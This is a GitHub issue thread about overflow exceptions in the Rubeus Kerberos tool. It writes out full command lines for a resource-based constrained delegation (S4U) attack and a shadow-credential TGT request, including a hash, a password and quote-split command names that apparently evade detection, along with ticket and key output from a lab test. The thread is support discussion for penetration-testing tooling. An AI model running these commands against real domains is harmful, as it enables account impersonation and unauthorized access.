### ISSUE TITLE
System.OverflowException For s4u, asktgt, describe

### ISSUE THREAD

**Issue by rootlo0p** [GhostPack/Rubeus#99]
Exploring abuse paths, I was unable to successfully pull off an RBCD attack, due to a System.Overflow exception when using the s4u Rubeus command. Failing that, I went down a different path of deploying alternate credentials on another target (via Whisker.exe), and then using Rubeus to request a TGT using the asktgt command with the /certificate flag. This also resulted in an overflow exception. Using asktgt for other, less-valuable, randomly selected targets worked fine. 

The original RBCD command:
``.\Dumpeus.exe s"4"u /user:AB0123CDEF /rc4:FCF7748F9820FE4B1C70F3D8A763ADDA /impersonateuser:'$UserStartsWithDollar' /msdsspn:WSMAN/up0013abcd.client.net /domain:client.net /dc:up123abc.client.net /luid: 0x9afcde8 /ptt``

The error, after successful TGT request, S4U32elf, and TGS acquisition [snipped from output preceding error]...
```
[*] Building S4U2proxy request for service: 'WSMAN/up0013abcd.client.net'
[*] Sending S4U2proxy request
[*] No more data available. Assuming Domain Controller [REDACTED] is finished sending data: An existing connection was forcibly closed by the remote host

[!] Unhandled Rubeus exception:

System.OverflowException: Array dimensions exceeded supported range.
   at proceed.henderson.doll(String server, Int32 port, Byte[] data, Boolean noHeader)
   at film.logging.bedroom(unique kirbi, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, Boolean opsec)
   at film.logging.commodity(unique kirbi, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, String targetDomainController, String targetDomain, Boolean s, Boolean opsec, Boolean bronzebit, String keyString, KERB_ETYPE encType, String requestDomain, String impersonateDomain)
   at film.logging.tribunal(String userName, String domain, String keyString, KERB_ETYPE etype, String targetUser, String targetSPN, String outfile, Boolean ptt, String domainController, String altService, unique tgs, String targetDomainController, String targetDomain, Boolean self, Boolean opsec, Boolean bronzebit)
   at rating.lpYCQJ6k3Gkd.Execute(Dictionary`2 arguments)
   at yQkttURY2tqu.confirm.restructuring(String commandName, Dictionary`2 arguments)
   at granted.trails.MainExecute(String commandName, Dictionary`2 parsedArgs)
```

Switching to a shadow credential attack, and then asking for a TGT, I received a similar error:
``
Dumpeus2.exe "a"s"k"t"g"t /user:$DifferentUserWithDollarSign /certificate:c:\temp\id.txt /password:P@55word1234567890 /domain:client.net /dc:up123abc.client.net /getcredentials /show``
```
[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=$DifferentUserWithDollarSign
[*] Building AS-REQ (w/ PKINIT preauth) for: 'client.net\$DifferentUserWithDollarSign'

[!] Unhandled Rubeus exception:

System.Exception: Error parsing response AS-REQ: digit.college: value overflow
   at bloom.community.brooklyn(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at bloom.community.distant(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at bone.ladder.award(cardiac asReq, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verbose, Boolean opsec).  Base64 response: a4IS**[BASE64 TICKET SNIPPED/REDACTED]**5sM=
   at bone.ladder.award(cardiac asReq, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verbose, Boolean opsec)
   at bone.ladder.heads(String userName, String domain, String certFile, String certPass, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, constraints luid, Boolean describe, Boolean verifyCerts)
   at nut.soap.Execute(Dictionary`2 arguments)
   at lit.FzaoJ2VoQiXp.centre(String commandName, Dictionary`2 arguments)
   at ef.WHJR6iiyUIHh.MainExecute(String commandName, Dictionary`2 parsedArgs)
```

Given the above error showed the base64 value of the ticket obtained therein, I attempted to describe it, with the following error:
``Dumpeus2.exe describe /ticket:a4IS**[BASE64 TICKET SNIPPED/REDACTED]**5sM=``
```
[*] Action: Describe Ticket


[!] Unhandled Rubeus exception:

digit.college: value overflow
   at bloom.community.brooklyn(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
   at bloom.community.distant(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
   at worlds.professor..ctor(Byte[] bytes)
   at photographers.climb.Execute(Dictionary`2 arguments)
   at lit.FzaoJ2VoQiXp.centre(String commandName, Dictionary`2 arguments)
   at ef.WHJR6iiyUIHh.MainExecute(String commandName, Dictionary`2 parsedArgs)
```

I don't think the issue is the obfuscation of Rubeus, because other tickets can be acquired/shown/passed/described without error. I also understand it may be difficult to troubleshoot this without the contents of the base64-encoded ticket, so I can decode and submit components of the tickets as warranted/requested to help resolve this [potential] issue.

This seems to be in the same ballpark as these issues:
* https://github.com/GhostPack/Rubeus/issues/90#issuecomment-902583125
* https://github.com/GhostPack/Rubeus/issues/47#issue-610444683

I am using the latest version. I also compiled the version from the June 7, 2021 commit (I believe the first commit with the /certificate capability), and I get the same errors.

Thanks!

**Comment by 0xe7** [comment]
I can't seem to reproduce this:

```
C:\Rubeus>.\Rubeus.exe asktgt /user:$new.user /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64F12CDDAA88057E06A81B54E73B949B
[*] Building AS-REQ (w/ preauth) for: 'internal.zeroday.lab\$new.user'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFjDCCBYi...RheS5sYWI=

  ServiceName              :  krbtgt/internal.zeroday.lab
  ServiceRealm             :  INTERNAL.ZERODAY.LAB
  UserName                 :  $new.user
  UserRealm                :  INTERNAL.ZERODAY.LAB
  StartTime                :  18/11/2021 17:00:27
  EndTime                  :  19/11/2021 04:00:27
  RenewTill                :  26/11/2021 17:00:27
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  mE7ujXx/Z84BfjdLwjuEvg==
  ASREP (key)              :  64F12CDDAA88057E06A81B54E73B949B
  ```

And `describe`:
```
C:\temp\dev\Rubeus-test\Rubeus\bin\Release>.\Rubeus.exe describe /servicekey:8e780...be823 /ticket:doIFjDCCB...RheS5sYWI=

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0


[*] Action: Describe Ticket


  ServiceName              :  krbtgt/internal.zeroday.lab
  ServiceRealm             :  INTERNAL.ZERODAY.LAB
  UserName                 :  $new.user
  UserRealm                :  INTERNAL.ZERODAY.LAB
  StartTime                :  18/11/2021 17:02:21
  EndTime                  :  19/11/2021 04:02:21
  RenewTill                :  26/11/2021 17:02:21
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  wjpJqQfq0l2q6fhxKXFTyg==
  Decrypted PAC            :
    LogonInfo              :
      LogonTime            : 18/11/2021 17:00:27
      LogoffTime           :
      KickOffTime          :
      PasswordLastSet      : 17/11/2021 06:28:49
      PasswordCanChange    : 18/11/2021 06:28:49
      PasswordMustChange   : 19/11/2021 06:28:49
      EffectiveName        : $new.user
      FullName             : New User
      LogonScript          :
      ProfilePath          :
      HomeDirectory        :
      HomeDirectoryDrive   :
      LogonCount           : 1
      BadPasswordCount     : 0
      UserId               : 1134
      PrimaryGroupId       : 513
      GroupCount           : 1
      Groups               : 513
      UserFlags            : (32) EXTRA_SIDS
      UserSessionKey       : 0000000000000000
      LogonServer          : IDC1
      LogonDomainName      : INTERNAL
      LogonDomainId        : S-1-5-21-2042794111-3163024120-2630140754
      UserAccountControl   : (16) NORMAL_ACCOUNT
      ExtraSIDCount        : 2
      ExtraSIDs            : S-1-5-21-0-0-0-497,S-1-18-1
      ResourceGroupCount   : 0
    ClientName             :
      Client Id            : 18/11/2021 17:02:21
      Client Name          : $new.user
    UpnDns                 :
      DNS Domain Name      : INTERNAL.ZERODAY.LAB
      UPN                  : $new.user@internal.zeroday.lab
      Flags                : 0
    ServerChecksum         :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : CB1BF391B8315A47C6479379 (VALID)
    KDCChecksum            :
      Signature Type       : KERB_CHECKSUM_HMAC_SHA1_96_AES256
      Signature            : E85CA5A7BEC795C08DAE497F (VALID)
```

**Comment by rootlo0p** [comment]
Thanks for checking! I figured there was probably a property value being returned by a request that wasn't getting parsed correctly. Unfortunately, I can't provide the user/ticket details for follow-up.

I'll go ahead and close this, given it's not really actionable.
